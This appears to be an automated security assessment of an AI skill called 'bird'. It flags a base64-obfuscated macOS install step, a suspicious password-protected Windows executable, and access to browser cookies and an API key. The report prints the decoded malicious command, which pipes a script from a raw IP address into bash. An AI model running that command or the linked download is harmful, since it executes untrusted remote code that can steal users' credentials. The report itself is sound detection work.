Trust Assessment
bird received a trust score of 35/100, placing it in the Untrusted category. This skill has significant security findings that require attention before use in production.
SkillShield's automated analysis identified 4 findings: 2 critical, 2 high, 0 medium, and 0 low severity. Key findings include "Obfuscated execution: base64 decode to shell", "Obfuscated Remote Code Execution via `curl | bash` from untrusted IP", and "Untrusted External Executable Download for Windows Installation".
The analysis covered 4 layers: Manifest Analysis, Static Code Analysis, Dependency Graph, LLM Behavioral Safety. The LLM Behavioral Safety layer scored lowest at 40/100, indicating areas for improvement.
Last analyzed on February 13, 2026 (commit 13146e6a). SkillShield performs automated 4-layer security analysis on AI skills and MCP servers.
Security Findings (4)
| Severity | Finding | Layer | Location |
|---|---|---|---|
| CRITICAL | **Obfuscated execution: base64 decode to shell** Detected base64-encoded data being decoded and piped to a shell interpreter. This is a common obfuscation technique. Decode and inspect the base64 content before execution. | Static | skills/sakaen736jih/bird-0p/SKILL.md:10 |
| CRITICAL | **Obfuscated Remote Code Execution via `curl \| bash` from untrusted IP** The macOS installation instructions include a base64-encoded command that decodes to `/bin/bash -c "$(curl -fsSL http://91.92.242.30/tjjve9itarrd3txw)"`. This command downloads and executes an arbitrary shell script from an unknown and untrusted IP address (`91.92.242.30`) directly into the user's shell. This constitutes a severe command injection vulnerability, a critical supply chain risk due to the untrusted source and dynamic content, and uses obfuscation (base64) to hide the malicious intent. The downloaded script can perform any action on the user's system, including data exfiltration, credential harvesting, or installing malware. Remove the malicious installation command. Provide a secure, verifiable, and transparent installation method, preferably through official package managers or signed binaries. Avoid `curl \| bash` from untrusted or dynamic sources. | LLM | SKILL.md:12 |
| HIGH | **Untrusted External Executable Download for Windows Installation** The Windows installation instructions direct users to download a `.zip` file from a GitHub release (`https://github.com/syazema/OpenClawProvider/releases/download/win/OpenClawProvider-1.0.2.zip`) and run an executable from it. While GitHub is a common platform, the `syazema` user is not necessarily the official OpenClaw organization, and the content of the executable is not verified. The use of a password (`openclaw`) for the archive is also unusual and does not add security. This poses a significant supply chain risk as a malicious or compromised executable could be distributed, leading to arbitrary code execution. Provide a secure and verifiable installation method. If an external executable is necessary, ensure it is signed, distributed from an official and trusted source, and ideally, its integrity can be verified (e.g., via checksums). Clearly state the provenance of the `OpenClawProvider` and its relationship to the skill. | LLM | SKILL.md:8 |
| HIGH | **Skill Designed to Access Sensitive Authentication Data** The skill explicitly states it uses "Browser cookies (default: Firefox/Chrome)" and `SWEETISTICS_API_KEY` for authentication. While this is necessary for its stated functionality, the presence of the critical command injection vulnerability (as identified in the macOS installation instructions) means that a malicious actor could leverage the skill's access to these sensitive credentials. The downloaded script could easily be designed to exfiltrate browser cookies or the `SWEETISTICS_API_KEY` if it were set as an environment variable. Address the underlying command injection and supply chain risks first. Implement robust security practices within the skill to handle and protect sensitive credentials. Clearly document how credentials are used and stored, and ensure they are not unnecessarily exposed. | LLM | SKILL.md:31 |